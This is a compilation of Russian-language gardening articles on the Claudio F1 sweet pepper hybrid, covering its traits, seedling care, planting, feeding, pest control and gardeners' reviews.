0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец клаудио описание особенности ухода урожайность и отзывы

Перец Клаудио F1: характеристика и описание сорта

Перец Клаудио является гибридным сортом, полученным голландскими селекционерами. Его выращивают на дачных участках и в фермерских хозяйствах. Сорт выделяется ранним созреванием и стойкостью к заболеваниям. Высоко ценится его товарный вид и вкусовые качества овоща.

Ниже приведены фото, описание перца Клаудио, а также особенности его выращивания и ухода.

Ботаническое описание

Перец Клаудио обладает рядом характеристик:

  • гибридный сорт раннего созревания;
  • всхожесть семян от 97 до 100%;
  • после переноса рассады плодоношение наступает на 70-80 день;
  • мощные прямостоячие кусты;
  • высота кустов от 50 до 70 см;
  • на одном растении вырастает до 12 плодов.

Особенности плодов сорта Клаудио:

  • масса 200-250 г;
  • толщина стенок 10 мм;
  • призмовидная форма с 4 камерами;
  • незрелые перцы имеют насыщенный зеленый цвет, меняющийся на темно-красный;
  • высокие вкусовые качества.

Сорт подходит для посадки в теплицах и на открытых участках. Перец Клаудио отличается хорошей транспортабельностью и выдерживает длительные перевозки.

Плоды сорта Клаудио собирают в состоянии технической зрелости, тогда срок их хранения составляет до 2 месяцев. Если плоды уже покраснели, то их нужно срывать и использовать как можно скорее. Сорт Клаудио подходит для консервирования и ежедневного рациона.

Рассада перцев

Перец Клаудио F1 выращивают рассадным методом. Сначала готовят почву и емкости, в которые помещают семена. После прорастания за рассадой ухаживают и переносят ее на постоянное место.

Подготовка к посадке

Перцы высаживают в феврале – марте. Перед проведением работ семена сорта Клаудио опускают в воду, нагретую до 50 градусов. Когда семенной материал набухнет, его заворачивают во влажную ткань и оставляют на 3 дня в тепле. Так стимулируют появление ростков.

Если семена покрыты цветной оболочкой, то они не нуждаются в дополнительной обработке. Производитель покрыл материал питательной смесью, которая способствует развитию растений.

Под посадку сорта Клаудио готовят грунт, в состав которого входит:

  • перегной – 1 стакан;
  • песок – 1 стакан;
  • садовая почва – 1 стакан;
  • древесная зола – 1 ложка.

Компоненты перемешивают и дезинфицируют в нагретой духовке или микроволновке. После остывания почву раскладывают по отдельным стаканчикам. Семена сорта заглубляют в грунт на 2 см. В одну емкость можно посадить по 2-3 семечка, затем выбрать наиболее сильные растения.

При использовании ящиков подросшей рассаде сорта Клаудио потребуется пикировка. Перец плохо реагирует на пересадки, поэтому рекомендуется сразу высаживать семена в отдельные контейнеры.

После высадки грунт поливают, а емкости накрывают стеклом или полиэтиленом. Несколько дней посадки держат в теплом месте до прорастания семян.

Условия для рассады

При появлении всходов перцы Клаудио нуждаются в особом уходе:

  • дневная температура примерно 26 градусов;
  • ночная температура – 12 градусов;
  • умеренная увлажненность почвы;
  • полив отстоявшейся водой.

Рассаде обеспечивают высокую влажность. Перцы опрыскивают теплой водой. При воздействии холодной воды растения испытывают стресс, медленно развиваются и становятся подверженными к заболеваниям.

Помещение с рассадой сорта Клаудио регулярно проветривают. В течение 12 часов растениям обеспечивается доступ к свету.

При появлении у перцев второго листа их подкармливают жидким удобрением Агрикола или Фертика. Вторую подкормку выполняют через 14 дней.

Высадка перцев

При формировании у сорта Клаудио первых бутонов его высаживают в теплицу или на открытые участки. Работы проводят в конце мая, когда воздух прогреется до 15 градусов.

Перец предпочитает легкую почву с малой кислотностью. Подготовка грунта начинается за год до высадки растений. Наилучшими предшественниками для культуры являются кабачки, огурцы, лук, тыква, морковь.

Осенью при перекопке почвы на 1 кв. м вносят 5 кг компоста, по 50 г суперфосфата и сульфата калия. Весной перед высадкой добавляют 30 г аммиачной селитры.

При высадке между перцами Клаудио оставляют 40 см. Если организуется несколько рядов, то между ними делают промежутки в 70 см.

Перец Клаудио высаживают в лунки, куда предварительно помещают по 1 ст. л. любого комплексного удобрения, содержащего фосфор, азот и калий. Растения опускают в яму, не заглубляя корневую шейку. После засыпания корней землей выполняют обильный полив.

Схема ухода

При надлежащем уходе Перец Клаудио F1 дают хороший урожай. Посадки поливают и подкармливают, а грядки мульчируют, рыхлят и пропалывают от сорняков.

Здоровый и крепкий куст сорта Клаудио получают за счет формирования. На каждом растении устраняют центральный цветок, выросший на первой ветви. В результате повышается урожайность культуры. Перцы формируют в 2 или 3 стебля. Боковые побеги прищипывают вручную.

Полив

По отзывам перец Клаудио хорошо развивается даже в засуху. Однако максимальный урожай снимают при правильной организации полива.

Сорт Клаудио поливают каждую неделю, пока не начнется цветения. При образовании плодов интенсивность полива повышают до 2 раз в неделю. После внесения влаги грунт аккуратно рыхлят, чтобы не повредить корни перцев.

При недостатке влаги у перцев замедляется развитие, поникают листья, опадают завязи. Сохранить увлажненность грунта помогает мульчирование грядок перепревшей соломой.

Подкормка

Перцы подкармливают раствором куриного помета в соотношении 1:10. За сезон процедуру повторяют дважды. Удобрение вносят под корень.

Растения опрыскивают раствором нитрофоски (1 ст. л. на ведро воды). Обработка проводится по листу утром или вечером, когда нет прямых солнечных лучей.

Для опыления перцев Клаудио на участок привлекают насекомых. Поэтому посадки опрыскивают раствором, состоящим из 2 л воды, 4 г борной кислоты и 0,2 кг сахара. Борная кислота стимулирует формирование завязей у растений.

Недостаток полезных веществ у перцев определяют по внешним признакам:

  • скрученные листья и сухие края свидетельствуют о нехватке калия;
  • при наличии матовых мелких листьев растения подкармливают азотом;
  • появление фиолетового оттенка с нижней стороны листа говорит о необходимости внести фосфор.

Защита от болезней и вредителей

Сорт Клаудио остается стойким к вирусу табачной мозаики. Это опасное заболевание, справиться с которым можно только путем уничтожения пораженных растений.

Грибковые заболевания поражают перцы, растущие в условиях повышенной влажности. Для борьбы с ними посадки сорта Клаудио опрыскивают препаратами Акара, Оксихом, Барьер, Заслон. Через 20 дней обработку повторяют.

Сорт Клаудио привлекают тлю, паутинного клеща, слизней и проволочника. Бороться с тлей помогает настой на древесной золе или табачной пыли. Паутинного клеща отпугивают настоем листьев одуванчиков или луковой шелухи.

Против проволочника эффективны ловушки из сладких корнеплодов, которые привлекают вредителей. От слизней используют горчичный порошок, перемолотый горький перец.

Инсектициды против вредителей используют с осторожностью. Эффективными препаратами, которые быстро разлагаются, являются Кельтан и Карбофос.

Отзывы садоводов

Заключение

Перец Клаудио – это высокоурожайный сорт, дающий сладкие плоды. Его ценят за раннее созревание, хороший вкус, универсальное применение. Растения нуждаются в уходе, подразумевающем полив, подкормку, формирование куста.

Перец «Клаудио»: характеристика и описание сорта, отзывы

Болгарский перец – одна из наиболее распространенных овощных культур, которая может выращиваться не только в промышленных условиях, но и на частных земельных участках. Среди ценителей этой культуры наибольшей популярностью пользуются гибридные сорта, адаптированные к особенностям российского климата. Сладкий перец «Клаудио», который был выведен селекционерами более 20 лет назад, не имеет равных по внешнему виду и размеру плодов.

Популярность этого сорта легко объяснить его отличными вкусовыми качествами, устойчивостью к большинству распространенных заболеваний и высокой урожайностью. Именно благодаря устойчивости сладкого болгарского перца «Клаудио» к суровым условиям нашего климатического пояса, этот гибрид часто выращивается на приусадебных участках.

Основные характеристики культуры

Гибридная форма перца заслуженно считается достаточно перспективным и высокопродуктивным растением, формирующим средней высоты куст с пагонами средней раскидистости. Сорт можно узнать по листьям темно-зеленой окраски с явно выраженными жилами более светлого оттенка. Структура листа отличается несколько сморщенной и шероховатой поверхностью.

Основным преимуществом сорта «Клаудио» считается устойчивость растения к засушливой и жаркой погоде, которая часто наблюдается в летний период на территории нашей страны. Также гибрид обладает иммунитетом перед достаточно популярным среди овощей вирусом табачной мозаики и крапчатости.

На кустах растения произрастают красивые плоды в форме призмы с гладкой поверхностью, характерного глянцевого блеска. В состоянии технической зрелости перчинки имеют зеленую окраску, которая постепенно изменяется на насыщенно красную. Плоды обладают относительно мясистыми стенками, толщиною в 6,5-7,8 мм, и имеют вес около 100-200 г.

Положительные и отрицательные качества сорта

Среди достоинств гибридного сорта можно выделить следующие качества сладкого перца «Клаудио»:

  1. Предсказуемые показатели продуктивности, которая составляет около 5-10 штук первый период и 7-9 — во время второй волны.
  2. Привлекательный внешний вид четырехкамерных плодов кубовидной формы.
  3. Ранний период созревания и отличное соотношение формы, вкусовых качеств, окраса и урожайности.
  4. Несмотря на раннюю спелость, плоды болгарского перца достаточно хорошо хранятся на протяжении длительного времени.
  5. Неприхотливость в уходе, а соответственно невысокая требовательность к прополке, подкормкам и высокой температуре окружающей среды.

Однако, как и у любого растения, выведенный селекционерами гибридный сорт сладкого перца «Клаудио» имеет ряд недостатков, наиболее значимыми среди которых можно назвать следующие:

  • требовательность к поливу;
  • в зависимости от региона произрастания могут отличаться и сроки созревания плодов;
  • сравнительно продолжительный переход от технической к биологической зрелости;
  • в период промежуточного окрашивания перец может иметь не очень привлекательный черно-бурый цвет.

Особенности выращивания рассады

Овощеводы-любители достаточно часто отказываются от выращивания такой овощной культуры, как сладкий перец, из-за не совсем подходящих климатических условий. Однако при выращивании растения с помощью рассадного способа можно добиться отличной урожайности сорта «Клаудио».

Одним из наиболее важных этапов в выращивании культуры является качественная подготовка грунта под рассаду. Для выращивания гибридного сорта «Клаудио-F1» лучше всего подходят виды грунта с нейтральными показателями кислотности. Иногда при подготовке земельного участка стоит не только выполнить его глубокую перекопку, но также удобрить грунт при помощи основного удобрения и технологии известкования, что существенно повысит его плодородность.

Высев семян на рассаду обычно зависит от желаемого периода созревания плодов, который для сладкого перца этого сорта составляет около 72-78 дней. В зависимости от вашего региона и присущих ему климатических условий это время обычно приходится на февраль-март.

Перед высадкой культуры в грунт, лунки следует обильно увлажнить и наполнить плодородной почвенной смесью. В первые дни, после помещения куста на новое место, следует обеспечивать его надежную защиту от солнца. Перед пересадкой растения, его нужно постепенно закаливать, а высадка производится лишь при достаточном прогреве почвы не только в течение светового дня, но и ночью.

Правила ухода за культурой

Процедура выращивания гибридной формы сладкого перца от зарубежных селекционеров является не слишком обременительной, а поэтому культура популярна как в кругу профессионалов, так и среди овощеводов-любителей. Однако для получения оптимальной урожайности этой огородной культуры необходимо соблюдать следующие рекомендации по агротехнике:

  1. Соблюдение температурного режима окружающей среды около 22°С для первого периода вегетации и 25-27°С в процессе массового созревания плодов.
  2. Достаточное количество солнечного света способствует быстрому росту и развитию растения, а плоды приобретают правильную и симметричную форму.
  3. При выращивании сладкого перца «Клаудио» на собственном огороде крайне важно своевременно проводить профилактику кустов от таких вредителей пасленовых культур, как личинки майского жука, тля, белокрылки и т.д. Для обработки растения подойдут как специальные препараты, так и народные методы.
  4. Полив грядок рекомендуется проводить после захода солнца, отстоянной и предварительно нагретой до температуры в 30°С водой. Для реализации этой процедуры подойдет как ручной способ, так и капельная система орошения.
  5. Перед цветением культуры следует провести ее подкормку органическими удобрениями, например, перепревшим навозом или компостом. При появлении завязи можно удобрить растение фосфорными составами, а в период созревания плодов – калийными веществами.

Для улучшения основных характеристик болгарского перца и более быстрого созревания плодов, рекомендуется формировать куст в 1,2 или 3 стебля. Для создания высокопродуктивного огородного растения нужно оставить лишь наиболее сильные пасынки, а остальные побеги удаляются. Такая процедура позволяет перцу перераспределить подачу питательных веществ к плодам, что в свою очередь гарантирует их более быстрое созревание и приобретение отменных вкусовых качеств.

Отзывы опытных овощеводов

Гибридный сорт сладкого перца «Клаудио F-1» имеет достаточно большое количество отзывов от опытных аграриев и обощеводов-любителей. Особенно ценят в данной культуре ее крупный размер и отличный внешний вид. Также стоит отметить, что огородная культура достаточно неприхотлива в уходе и имеет высокие показатели урожайности – более 2-2,5 кг с куста.

Наталия, 32 года. Уфа

В этом году решила высадить сладкий перец «Клаудио» как в теплицу, так и на открытый грунт. Порадовали вкусовые качества полученной культуры, ведь плоды отличаются достаточно мясистыми стенками, сочностью и приятным перечным ароматом. Выращенные в условиях открытого грунта растения дали более сладкий урожай с мягкой и нежной кожицей, однако некоторые перчинки не успели достичь биологической зрелости до похолодания. А вот в теплицах удалось собрать достаточно красивый перец, который отлично подойдет для приготовления пищи и заготовок.

Марина, 46 лет. Подмосковье

При выращивании гибрида «Клаудио F-1» особенно порадовала всхожесть семян, ведь несмотря на их низкую плодородность при повторной высадке изначально семенной материал дает практически 100% всходов. Выращивала перец теплице с капельной системой орошения, что позволило получить достаточно обильный и привлекательный урожай. Каждый куст дает около 7-8 плодов среднего и крупного размеров. Заметила, что сорт позиционируется как раннеспелый, но охарактеризовала бы его как перец средней, а то и поздней спелости.

Константин, 30 лет. Самара

В этом году засадил земельный участок сладким перцем «Клаудио». Выращивал популярную огородную культуру рассадным способом, удобряя грунт древесной золой. Результат приятно удивил и порадовал. В следующем году снова планирую высадить старый, но проверенный гибридный сорт. Теперь и соседи, глядя на мой урожай, планируют у себя тоже посадить эту культуру.

Перец Клаудио: описание, особенности ухода, урожайность и отзывы

Известному гибриду сладкого болгарского перца Клаудио уже более 20 лет. Этого времени многим овощным растениям хватает для того, чтобы их благополучно забыли, но эффектный крупноплодный перец Клаудио, наоборот, становится все более востребованным. Это неудивительно.

Перец Клаудио: описание

Знаменитый гибрид голландской селекции универсален и способен продуктивно развиваться как на открытых грядах, так и в условиях тепличного хозяйства. Южанин по происхождению и предпочтениям, перец Клаудио включен в российский госреестр перспективных овощных культур Северокавказского региона и выращивается на юге в промышленных масштабах. Но огородники Урала и Сибири не понаслышке знакомы с этой культурой и уже давно снимают впечатляющие урожаи перца в теплицах и парниках, несмотря на неподходящие теплолюбивому растению климатические условия умеренных широт.

Позиционируемый производителями как ранний, гибрид Клаудио таковым и является при культивировании в теплых южных районах, однако в умеренных зонах нашей страны период его вегетации затягивается в силу вполне закономерных причин, и овощеводами сорт рассматривается как среднепоздний. Впрочем, этот факт не влияет на популярность культуры.

Перец Клаудио F1 формирует мощный среднерослый полураскидистый куст, достигающий высоты от 0,7 до 1,2 м. Листья изумрудно-зеленые, яркие и крупные. Несмотря на достаточно крепкий ствол, растение нуждается в подвязке, поскольку под весом наливающихся плодов может накрениться или и вовсе упасть.

Плоды

Гибридная форма Клаудио покорила сердца садоводов великолепными вкусными и красивыми плодами – пониклыми, правильно кубовидно-вытянутыми, сформированными четырьмя камерами. При полном созревании цвет плодов насыщенно-красный, близкий к густо-бордовому, на этапе технической спелости — изумрудный, в процессе созревания — темно-зеленый. Для созревающих плодов характерно неравномерное окрашивание – на красной поверхности темные, почти черные неправильной формы полоски, которые впоследствии исчезают.

Средний вес плода — 150-175 г, часто они достигают 200-250 г, реже удается получить максимальные плоды весом до 300-350 г, хотя, как правило, для гибрида характерна одномерность.

Заявленная толщина стенки перца внушительна – 6-8 мм, но, по отзывам овощеводов, она может достигать 10-14 мм. Кожица глянцевая, плотная и достаточно прочная, но абсолютно лишена жесткости. Перец Клаудио F1 – мясистый, сочный, сладкий с чуть заметной пикантной горчинкой, вкусный, обладающий превосходным ароматом истинного болгарского перца.

Достоинства культуры

Типичными качествами, отличающими перец Клаудио (отзывы овощеводов подтверждают) от других сортов и гибридов, считаются:

  • Достаточно высокая (и предсказуемая!) продуктивность – в зависимости от района выращивания с 1 гектара собирают от 300 до 450 ц.
  • Выход качественной товарной продукции составляет 95-97%.
  • Жаростойкость.
  • Стрессоустойчивость культуры.
  • Противостояние традиционным заболеваниям пасленовых – крапчатости перцев, вирусу картофеля, табачной мозаике.
  • Товарность гибрида, проявляющаяся в почти идеальной форме плода.
  • Удачное соотношение вкусовых качеств плода с урожайностью и формой.
  • Неприхотливость в уходе – равнодушие культуры к повышенной плотности посадок, регулярности подкормок и поливов.

Особенности сорта

На одном кусте одновременно завязывается до 5-10 плодов. По окончании цветения, спустя некоторое время наступает 2-я волна, менее щедрая – 2-5 штук. К недостаткам гибрида относят невысокую скорость перехода от технической спелости к биологической, т. е. полному окрашиванию плода – ярко-красному, характеризующему перец Клаудио F1. Отзывы овощеводов, поднаторевших в выращивании, единодушно утверждают, что ускорить окрашивание поможет удаление излишней мелкой завязи, не успевающей вызреть, но оттягивающей силы растения на себя. Кроме того, следует регулярно обрывать пасынки, засыхающие листья, к концу июля прищипывать верхушки побегов.

Выращивание

Перец Клаудио, как и многие другие пасленовые культуры, выращивают рассадой в различных емкостях, контейнерах или горшочках.

В стадии 2-3 настоящих листьев сеянцы пикируют по отдельным горшочкам. Высаживать их на постоянное место следует при прогреве почвы до 13-15°С. Схема посадок – 40*40 см, на 1 кв. метра размещают 3-4 куста.

Уход за посадками

Несмотря на завидную неприхотливость этой культуры, высоких урожаев можно добиться, лишь грамотно осуществляя основные правила агротехники, такие как:

  • Обеспечение опор, подвязывание и обязательное удаление пасынков и листьев нижних ярусов.
  • Формирование куста в 2-3 стебля: появившийся первый цветок-корону обрывают, а после появления развилки выбирают пару-тройку самых крепких побегов, удаляя остальные.
  • Оптимальная температура для качественного роста культуры – 22-25°С, при наступлении стадии окрашивания плодов – 25-27°С.
  • Своевременные поливы теплой водой, рыхления почвы под кустами.

Подкормки

Интенсивное развитие культуры предполагает регулярные внесения удобрений. Клаудио – перец сладкий, и его вкус существенно зависит от периодичности и качества подкормок.

Перец Клаудио F1: отзывы

Анализируя отзывы, оставленные в сети фермерами и дачниками, можно отметить следующие:

  • Великолепное качество посевного материала, высокая всхожесть семян.
  • Замечательная продуктивность культуры – более 2,5 кг перцев с одного куста.
  • Клаудио – перец сладкий, обладает превосходными вкусовыми свойствами плодов, для которых характерны мясистые стенки, негрубая кожица, ароматная мякоть, сочная, без выраженной горечи и приятный традиционный аромат классического болгарского сладкого перца.

Невзирая на появление новых сортов перца, армия ценителей этого известного гибрида увеличивается с каждым годом. Неприхотливый и отзывающийся на заботу яркими полезными и вкусными плодами, Клаудио для многих стал наиболее приемлемым и удобным в выращивании овощем.

Сладкий перец Клаудио F1: отзывы, фото, особенности гибрида

Сладкий перец Клаудио относится к гибридам голландской селекции. Это один из самых популярных сортов среди огородников, включенный в Госреестр РФ в 2007 году. Рекомендован для культивирования в регионах с жарким и продолжительным летом. Однако благодаря раннеспелости и устойчивости к температурным катаклизмам может выращиваться и в местностях с прохладной и переменчивой погодой в условиях теплицы.

Описание и характеристика сорта

Перец Клаудио F1 ценится в первую очередь за раннеспелость и неприхотливость к погодным условиям. После того как рассада высажена на постоянное место, овощевод может рассчитывать на появление первого урожая спустя 72-80 дней в фазе технической спелости.

Гибрид формирует куст высотой 60 см в открытом грунте и до 0,9 м в условиях теплицы. Надземная часть у растения полураскидистая и мощная. Куст имеет хорошую облиственность, что позволяет защищать плоды от ожогов ультрафиолетом. На одном растении формируется до 12 плодов кубовидного типа, примерно одинакового размера.

На разрезе видно, что перец имеет 3 или 4 камеры и очень толстую стенку (см. фото). Толщина стенки перикарпия может варьироваться от 0,8 до 1,4 см.

В среднем длина плодов составляет 11-13 см. Самые первые и крупные экземпляры могут вытягиваться до 18 см. Диаметр (ширина) ближе к плодоножке при этом составляет 8-9 см.

Перцы на стадии технической спелости окрашены в темно-зеленый цвет. По мере дальнейшего созревания овощи меняют окраску на красную. Вес одного экземпляра составляет в среднем 200-260 гр.

С 1 куста собирают от 1 до 1,5 кг урожая в открытом грунте и 2-2,5 кг − в защищенном.

Вкусовые характеристики перца Клаудио оцениваются потребителями на отлично. Мякоть у плодов сочная и нежная, с выраженным перечным ароматом. Кожица с глянцевым оттенком, прочная, но тонкая.

Клаудио F1 идеально подходит для потребления свежим и всех видов кулинарных переработок.

Овощи обладают хорошей лежкостью и транспортабельностью, но только в фазе молочной спелости.

Снимать плоды с кустов рекомендуется зелеными. Так овощи не будут оттягивать на себя питательные вещества, необходимые для формирования новых завязей. В домашних условиях перец дозаривает в течение 2 месяцев.

Особенности выращивания и ухода

Перед тем как сеять семена перцев на рассаду, производитель рекомендует провести замачивание или проращивание. В обеззараживании посевной материал не нуждается, так как эту обработку проводит агрофирма, выпускающая гибридный продукт.

Высевают на рассаду с 20 февраля по 10 марта. Первые сеянцы в среднем появляются спустя 7-10 дней. Рассада Клаудио F1 требует обязательного закаливания и пикирования.

На постоянное место выращивания растения переносят в середине мая или начале июня (зависит от региона и защищенности грунта). Обязательное условие − отсутствия риска возвратных заморозков.

На кв. м. размещают не более 3-4 растений из-за особенностей строения кустов.

В уходе перец Клаудио не отличается от других сортов болгарского перца. Он требует обильного увлажнения почвы раз в 3-4 дня, прополки сорняков и рыхление грунта. Гибрид отзывчив на минеральные удобрения. Внесение подкормок во время полива повышают продуктивность растения. За сезон овощную культуру подкармливают 2-3 раза.

Куст можно формировать в 2-3 стебля. Дополнительно рекомендуется удалять первый цветок в развилке и все нижние листья с пасынками.

Болезни и вредители

Перец Клаудио по описанию производителя имеет генетическую устойчивость к вирусным заболеваниям, в частности табачной мозаике и Y-вирусу картофеля.

Гибридный сорт при нарушении правил агротехники может подвергаться вершинной гнили. Особенно болезнь актуальна для южных регионов.

Для перца опасны такие вредители, как слизни, проволочник, совка, белокрылка, колорадский жук и др.

Достоинства и недостатки

Перец Клаудио по характеристике и описанию сорта оригинатором, а также отзывам овощеводов, обладает следующими достоинствами:

  • семена хорошо и дружно всходят;
  • неприхотлив в уходе;
  • устойчив ко многим заболеваниям пасленовых;
  • хорошо переносит засуху и жару;
  • формирует крупные плоды с отличными вкусовыми качествами;
  • долго хранится при снятии в фазе технической спелости;
  • показывает высокую урожайность при соблюдении правил агротехники.

Среди недостатков некоторые огородники отмечают долгое дозаривание плодов.

Похожие сорта

Перец Клаудио F1 по описанию и характеристике имеет сходство со следующими гибридами:

  • Латино F1;
  • Эскимо F1;
  • Гигант красный F

Латино − раннеспелый сладкий перец, отдающий урожай после появления всходов спустя 3,5 месяца. Растение формирует куст высотой до 1 метра. Кубовидные перцы при полной спелости имеют насыщенный красный цвет. Плоды крупные и толстостенные. Один экземпляр весит 200 гр., толщина стенки перикарпия при этом может достигать 1 см. На кв. м. высаживают до 3 растений. При такой плотности посадок с соблюдением агротехнических правил культивирования можно получить 7-14 кг урожая. Гибрид подходит для выращивания под любыми видами укрытий. Овощная культура генетический устойчива к вирусу картофельной и табачной мозаики.

Эскимо − крупноплодный гибрид, масса перцев которого варьируется от 150 до 400 гр. Темно-красные кубовидные плоды наделены сочной, мясистой стенкой и отличными вкусовыми качествами. Растение имеет компактный, полураскидистый куст, вырастающий в высоту до 0,6 м. Устойчив к холодным погодным условиям, может культивироваться в незащищенном грунте. Период созревания плодов − 2 месяца после того, как рассада перемещена на постоянное место выращивания.

Гигант красный − еще один раннеспелый продукт голландской селекции. Плоды гибрида похожи на перцы Клаудио. Они кубовидной формы, толстостенные (до 12 мм), имеют ярко-красную окраску и вес до 300 гр. Центральный стебель может достигать в длину 1 м. Этот перец любит солнце и тепло, поэтому больше подходит для южных регионов.

Отзывы огородников

«Среди всех сортов перцев наибольшее предпочтение отдаю голландскому гибриду Клаудио Ф1. Сеять на рассаду начинаю в 20-х числах февраля. В начале мая пересаживаю рассаду в теплицу. В середине июля я уже с урожаем. Не жду, чтобы перцы на кустах поменяли цвет на красный. Снимаю их зелеными, они прекрасно доспевают дома. По вкусу перцы неплохи и при технической спелости, но полный вкусовой потенциал раскрывают только при полном созревании».

«Клаудио мой любимый гибрид. У него практически всегда стопроцентная всхожесть. Хоть и не рекомендуют брать семена от гибридов, в этом году решила все же рискнуть и вырастить перец из собственно собранных зернышек. Плоды получились немного мельче и не все правильной формы. На вкусовых качествах это никак не отразилось».

«Нравится этот перец за нетребовательность в уходе. Достаточно вовремя поливать и вносить удобрения. Чтобы растения не болели, рекомендую выращивать после лука, тыквы. Ни в коем случае нельзя сажать после баклажанов, помидоров и картофеля. Если культуры чем-то болели, есть большая вероятность и заражения перца».

Гибрид Клаудио предпочитают выращивать на своем участке многие огородники за счет его высокой урожайности, неприхотливости в уходе и хорошей лежкости в фазе технической спелости. Однако у перца есть достойные конкуренты, которые ни в чем ему не уступают или даже превосходят.

Клаудио F1: описание перца и особенность его выращивания

Клаудио – один из лучших перцев, представленных на рынке гибридов. Яркий, сочный, ароматный, он богат витаминами, не требователен в уходе и порадует вас прекрасным урожаем.

Происхождение перца Клаудио F1

Перец Клаудио F1 – гибрид голландской линии компании NUNHEM. Рекомендован для южных широт. Включен в Госреестр селекционных достижений России в 2007 году для Северного Кавказа.

Характеристика и описание гибрида

Как и любой современный гибрид, Клаудио обладает высокой урожайностью, устойчивостью к болезням и переменам погоды и превосходными вкусовыми качествами.

Описание куста

Полураскидистые растения прямые, около 70 см в высоту, мощные и сильные. Для его формирования удаляются боковые побеги до первой развилки. Множественные тёмно-зелёные листья выше среднего размера, несколько морщинистые. Каждый куст даёт 10-12 крупных плодов.

Внешний вид плодов

Перцы большие, при полноценном уходе могут достигать 250 г, призмовидные, с 4 семенными камерами и толстыми стенками до 10 мм, глянцево-красные. Размеры плода в среднем составляют 8 см в ширину и 12-14 см в длину. Кожица крепкая, но тонкая.

Вкусовые качества

Клаудио славится превосходным вкусом. Насыщенная ароматная мякоть очень нежная и вкусная.

Особенности сорта и применение

В южных регионах перец относится к раннеспелым, севернее он скорее среднепоздний. При сборе технически зрелых зеленых плодов Клаудио превосходно хранится и легко переносит транспортировку. В таких условиях дозревает около 2 месяцев. Собранному же красным, требуется быстрая переработка или употребление.

Овощи универсальны в применении: великолепны свежими в салатах и овощных нарезках, сохраняют безупречный вкус после термической обработки, хороши в заморозке и при консервировании.

Агротехника выращивания перца Клаудио F1

Тщательный уход за растениями позволит получить хорошие урожаи до 464 ц/га с крупными сочными плодами.

Подготовка семян

Оптимальным периодом для посева рассады считается конец февраля – первые числа марта.

Посадочный материал перед продажей производители обрабатывают специальным питательным раствором, в таком случае никакой подготовки не требуется.

Семенам, покрытым цветной оболочкой, не нужно замачивание.

В случае самостоятельного сбора зёрен перца или покупки неподготовленных проведите предпосадочную подготовку:

  • опустите семена в стакан с водой температурой приблизительно 50 градусов;
  • после набухания заверните их в увлажненную ткань;
  • поместите в тепло на 3 дня.

Такие манипуляции стимулируют появление ростков.

Подготовка к посадке

Подготовка к посадке включает в себя несколько этапов:

  1. Для посева материала купите специальный рассадный грунт или приготовьте его самостоятельно. Для этого соедините равное количество перегноя, песка и садовой земли. Добавьте древесную золу из расчёта 1 ст. л. на 3 стакана смеси. Также можно воспользоваться торфяными стаканчиками, тогда дополнительно готовить почву не потребуется.
  2. Для обеззараживания прокалите грунт в духовке в течение получаса при температуре 160 градусов.
  3. Заполните почвой ёмкости для посадки. Идеальной формой для рассады будут ёмкости с дренажными отверстиями, установленные в поддон для полива.
  4. Полейте землю до посадки семян или обильно обрызгайте из пульверизатора после.
  5. Посевной материал заделывайте в почву на глубину 1-2 см, по 2-3 семечка, чтобы в дальнейшем оставить наиболее сильный росток.
  6. После посадки укройте ёмкости плёнкой или стеклом и оставьте в тепле до первых всходов.

Подробнее о том, когда и как сеять перец на рассаду узнайте на страницах нашего сайта.

Рассадный период и условия

При прорастании семян укрывной материал убирают и оставляют рассаду под хорошим освещением.

На несколько недель можно организовать дополнительный свет фитолампами, отключая их только на ночь.

В светлое время суток температура поддерживается на уровне 25 градусов, ночная около 12. Подросшие перцы закаливают, на неделю снижая температурный уровень днём до 17-18 градусов.

Для оптимальной влажности растения опрыскивают тёплой водой. Для полива её обязательно отстаивают. Холодная жидкость будет стрессом для рассады и может вызвать замедление роста или болезнь.

При появлении второго листка желательно подкормить растение. Используйте жидкие «Фертику» или «Агриколу». Или приготовьте раствор самостоятельно из суперфосфата (125 г), калийной соли (30 г) и мочевины (50 г) на ведро воды. Через 2 недели снова удобрите почву.

Когда и как подкормить рассаду перца узнайте со следующей статьи.

Высадка перцев

После формирования первых бутонов рассада готова к пересадке в теплицы или открытый грунт. Обычно это происходит к концу мая, когда среднесуточная температура воздуха не опускается ниже +15.

Клаудио F1 предпочитает слабо-кислую почву. Её подготавливают заранее. Самыми подходящими предшественниками будут огурцы, морковь, лук или кабачки. Благоприятным соседом по грядке окажется базилик.

Не высаживайте перцы на место, где в предыдущем году были помидоры, баклажаны или картофель.

Осенью будущее место посадки перекапывается и удобряется. На 1 кв. м добавляют по 50 г суперфосфата и сульфата калия и 5 кг компоста. Весной перед высадкой растений вносят по 30 г аммиачной селитры на каждый квадратный метр.

Для пересадки перцев в грунт:

  1. Учитывая раскидистость растений, придерживайтесь схемы посадки 40×70 см.
  2. В каждое углубление для посадки предварительно положите по столовой ложке удобрения с фосфором, калием и азотом.
  3. Поместите молодые растения в лунки и присыпьте землёй до уровня корневой шейк.
  4. Обильно полейте рассаду.
  5. При наличии возможности замульчируйте посадки торфом.

Полив

Хотя гибрид Клаудио и относится к засухоустойчивым, своевременный полив положительно влияет на качество плодов.

До начала цветения перец поливается еженедельно и довольно обильно, далее каждые 3-4 дня по 15 литров на 1 кв. м.

Вода обязательно должна быть отстоявшейся и тёплой. Лучшее время увлажнения – после захода солнца. После полива прорыхлите верхний слой почвы.

Подкормка

Растения подкармливают 2-4 раза за сезон. Дважды под корень вносят раствор куриного помёта в соотношении 1 к 10. Перед цветением полезно добавить калийную селитру. Во время плодоношения и цветения удобряют калием, магнием и фосфатами или комплексными препаратами. При созревании перца полезными будут калийные добавки.

По некоторым признакам можно определить, что недополучает растение:

  • сухие края листьев и их скрученность – недостаток калия;
  • мелкие матовые литья – мало азота;
  • фиолетовый оттенок нижней стороны листа – нехватка фосфора.

Устойчивость к болезням и вредителям

Для стойкого иммунитета перцев на первом месте стоит соблюдение правильной агротехники:

  • севооборот с учётом предпочтения предшественников;
  • прополка;
  • поддержание адекватной влажности;
  • прореживание и удаление поврежденных листьев;
  • обработка растений при первых признаках болезни.

Основные заболевания можно разделить на 3 вида:

Для борьбы с грибком (фитофтороз, антракноз, белая и серая гнили, бурая пятнистость, вертициллёз) используют обработку современными препаратами: «Оксихом», «Фундазол», «Превикур», «Барьер». С антракнозом отлично справляется бордосская смесь. При использовании строго следуйте инструкциям на упаковках.

Болезни, вызванные бактериями, лечат обработкой медным купоросом (мокрая плодовая гниль и бактериальный рак).

